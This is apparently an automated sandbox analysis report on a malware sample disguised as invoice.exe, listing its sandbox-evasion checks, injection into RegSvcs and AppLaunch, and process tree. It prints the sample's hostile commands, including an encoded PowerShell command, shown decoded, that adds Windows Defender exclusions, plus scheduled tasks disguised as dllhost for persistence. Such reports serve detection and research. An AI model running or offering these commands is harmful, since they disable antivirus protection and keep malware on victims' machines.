                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Process information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  Source: Yara match - File source: Process Memory Space: powershell.exe PID: 104400, type: MEMORYSTR
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe - Memory allocated: 4D80000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe - Memory allocated: 6840000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe - Memory allocated: 8840000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe - Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe - Thread delayed: delay time: 600000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe - Thread delayed: delay time: 599891
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe - Thread delayed: delay time: 599766
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe - Thread delayed: delay time: 599641
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe - Thread delayed: delay time: 599532
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe - Thread delayed: delay time: 599407
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe - Thread delayed: delay time: 599297
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe - Thread delayed: delay time: 599187
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe - Thread delayed: delay time: 599078
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe - Thread delayed: delay time: 598969
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe - Thread delayed: delay time: 598860
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe - Thread delayed: delay time: 598735
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe - Thread delayed: delay time: 598610
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe - Thread delayed: delay time: 598485
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe - Thread delayed: delay time: 598360
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe - Window / User API: threadDelayed 802
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe - Window / User API: threadDelayed 1981
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Window / User API: threadDelayed 6576
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Window / User API: threadDelayed 3086
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 7256 - Thread sleep time: -7378697629483816s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 7256 - Thread sleep time: -600000s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 7260 - Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 7376 - Thread sleep count: 802 > 30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 7256 - Thread sleep time: -599891s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 7376 - Thread sleep count: 1981 > 30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 7256 - Thread sleep time: -599766s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 7256 - Thread sleep time: -599641s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 7256 - Thread sleep time: -599532s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 7256 - Thread sleep time: -599407s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 104284 - Thread sleep time: -30000s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 7256 - Thread sleep time: -599297s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 7256 - Thread sleep time: -599187s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 7256 - Thread sleep time: -599078s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 7256 - Thread sleep time: -598969s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 7256 - Thread sleep time: -598860s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 7256 - Thread sleep time: -598735s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 7256 - Thread sleep time: -598610s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 7256 - Thread sleep time: -598485s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 7256 - Thread sleep time: -598360s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4176 - Thread sleep count: 6576 > 30
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 104440 - Thread sleep count: 3086 > 30
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6648 - Thread sleep time: -9223372036854770s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe - WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT TotalPhysicalMemory FROM Win32_ComputerSystem
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\invoice.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 600000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 599891
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 599766
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 599641
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 599532
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 599407
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 30000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 599297
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 599187
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 599078
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 598969
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 598860
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 598735
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 598610
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 598485
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 598360
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: AppLaunch.exe, 0000000F.00000002.1789091903.0000000006841000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Vmwaretrat
                  Source: Amcache.hve.9.drBinary or memory string: VMware
                  Source: AppLaunch.exe, 0000000F.00000002.1789091903.0000000006841000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vboxservice
                  Source: Amcache.hve.9.drBinary or memory string: VMware Virtual USB Mouse
                  Source: Amcache.hve.9.drBinary or memory string: vmci.syshbin
                  Source: Amcache.hve.9.drBinary or memory string: VMware, Inc.
                  Source: Amcache.hve.9.drBinary or memory string: VMware20,1hbin@
                  Source: Amcache.hve.9.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                  Source: Amcache.hve.9.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: Amcache.hve.9.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                  Source: Amcache.hve.9.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: AppLaunch.exe, 0000000F.00000002.1791695388.0000000009CB0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll(
                  Source: AppLaunch.exe, 0000000F.00000002.1789091903.0000000006841000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Vmwareuser
                  Source: Amcache.hve.9.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                  Source: Amcache.hve.9.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                  Source: Amcache.hve.9.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: RegSvcs.exe, 0000000B.00000002.1729806081.0000000001377000.00000004.00000010.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1787181662.0000000000402000.00000020.00000400.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006841000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vboxtray
                  Source: Amcache.hve.9.drBinary or memory string: vmci.sys
                  Source: Amcache.hve.9.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                  Source: Amcache.hve.9.drBinary or memory string: vmci.syshbin`
                  Source: Amcache.hve.9.drBinary or memory string: \driver\vmci,\driver\pci
                  Source: Amcache.hve.9.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: RegSvcs.exe, 00000006.00000002.2889790802.0000000000894000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlls
                  Source: AppLaunch.exe, 0000000F.00000002.1789091903.0000000006841000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Vmtoolsd
                  Source: Amcache.hve.9.drBinary or memory string: VMware20,1
                  Source: Amcache.hve.9.drBinary or memory string: Microsoft Hyper-V Generation Counter
                  Source: Amcache.hve.9.drBinary or memory string: NECVMWar VMware SATA CD00
                  Source: Amcache.hve.9.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                  Source: Amcache.hve.9.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                  Source: Amcache.hve.9.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                  Source: Amcache.hve.9.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                  Source: Amcache.hve.9.drBinary or memory string: VMware PCI VMCI Bus Device
                  Source: Amcache.hve.9.drBinary or memory string: VMware VMCI Bus Device
                  Source: Amcache.hve.9.drBinary or memory string: VMware Virtual RAM
                  Source: Amcache.hve.9.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                  Source: Amcache.hve.9.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information queried: ProcessInformation
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\4usfliof.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\4usfliof.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\yee9mbi69cm7.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\yee9mbi69cm7.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess token adjusted: Debug
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\4usfliof.exe -- Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 5A0000 protect: page execute and read and write
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\yee9mbi69cm7.exe -- Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe -- Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000 protect: page execute and read and write
                  Source: C:\Windows\SysWOW64\cmd.exe -- Process created: Base64 decoded <#5Kms8#> Add-MpPreference <#wH#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#clJa8cj9Z#> -Force <#tWC#>
                  Source: C:\Windows\SysWOW64\cmd.exe -- Process created: Base64 decoded <#5Kms8#> Add-MpPreference <#wH#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#clJa8cj9Z#> -Force <#tWC#>
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\4usfliof.exe -- Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 5A0000 value starts with: 4D5A
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\yee9mbi69cm7.exe -- Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe -- Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000 value starts with: 4D5A
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\4usfliof.exe -- Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 5A0000
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\4usfliof.exe -- Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 3EC008
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\yee9mbi69cm7.exe -- Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\yee9mbi69cm7.exe -- Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 1085008
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe -- Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe -- Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 4661008
                  Source: C:\Users\user\Desktop\invoice.exe -- Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.bat" "
                  Source: C:\Windows\SysWOW64\cmd.exe -- Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c dir /b "*.exe"
                  Source: C:\Windows\SysWOW64\cmd.exe -- Process created: C:\Users\user\AppData\Local\Temp\RarSFX0\4usfliof.exe "4usfliof.exe"
                  Source: C:\Windows\SysWOW64\cmd.exe -- Process created: C:\Users\user\AppData\Local\Temp\RarSFX0\yee9mbi69cm7.exe "yee9mbi69cm7.exe"
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\4usfliof.exe -- Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\yee9mbi69cm7.exe -- Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\yee9mbi69cm7.exe -- Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe -- Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe -- Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C powershell -EncodedCommand "PAAjADUASwBtAHMAOAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHcASAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBjAGwASgBhADgAYwBqADkAWgAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB0AFcAQwAjAD4A" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe -- Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe -- Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk9049" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                  Source: C:\Windows\SysWOW64\cmd.exe -- Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "PAAjADUASwBtAHMAOAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHcASAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBjAGwASgBhADgAYwBqADkAWgAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB0AFcAQwAjAD4A"
                  Source: C:\Windows\SysWOW64\cmd.exe -- Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                  Source: C:\Windows\SysWOW64\cmd.exe -- Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk9049" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe -- Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c powershell -encodedcommand "paajaduaswbtahmaoaajad4aiabbagqazaatae0acabqahiazqbmaguacgblag4aywblacaapaajahcasaajad4aiaataeuaeabjagwadqbzagkabwbuafaayqb0aggaiabaacgajablag4adga6afuacwblahiauabyag8azgbpagwazqasacqazqbuahyaogbtahkacwb0aguabqbeahiaaqb2aguakqagadwaiwbjagwasgbhadgaywbqadkawgajad4aiaataeyabwbyagmazqagadwaiwb0afcaqwajad4a" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off
                  Source: C:\Windows\SysWOW64\cmd.exe -- Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -encodedcommand "paajaduaswbtahmaoaajad4aiabbagqazaatae0acabqahiazqbmaguacgblag4aywblacaapaajahcasaajad4aiaataeuaeabjagwadqbzagkabwbuafaayqb0aggaiabaacgajablag4adga6afuacwblahiauabyag8azgbpagwazqasacqazqbuahyaogbtahkacwb0aguabqbeahiaaqb2aguakqagadwaiwbjagwasgbhadgaywbqadkawgajad4aiaataeyabwbyagmazqagadwaiwb0afcaqwajad4a"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe -- Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c powershell -encodedcommand "paajaduaswbtahmaoaajad4aiabbagqazaatae0acabqahiazqbmaguacgblag4aywblacaapaajahcasaajad4aiaataeuaeabjagwadqbzagkabwbuafaayqb0aggaiabaacgajablag4adga6afuacwblahiauabyag8azgbpagwazqasacqazqbuahyaogbtahkacwb0aguabqbeahiaaqb2aguakqagadwaiwbjagwasgbhadgaywbqadkawgajad4aiaataeyabwbyagmazqagadwaiwb0afcaqwajad4a" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off
                  Source: C:\Windows\SysWOW64\cmd.exe -- Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -encodedcommand "paajaduaswbtahmaoaajad4aiabbagqazaatae0acabqahiazqbmaguacgblag4aywblacaapaajahcasaajad4aiaataeuaeabjagwadqbzagkabwbuafaayqb0aggaiabaacgajablag4adga6afuacwblahiauabyag8azgbpagwazqasacqazqbuahyaogbtahkacwb0aguabqbeahiaaqb2aguakqagadwaiwbjagwasgbhadgaywbqadkawgajad4aiaataeyabwbyagmazqagadwaiwb0afcaqwajad4a"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe -- Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe -- Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe -- Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe -- Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe -- Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe -- Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe -- Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe -- Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe -- Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe -- Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\ VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
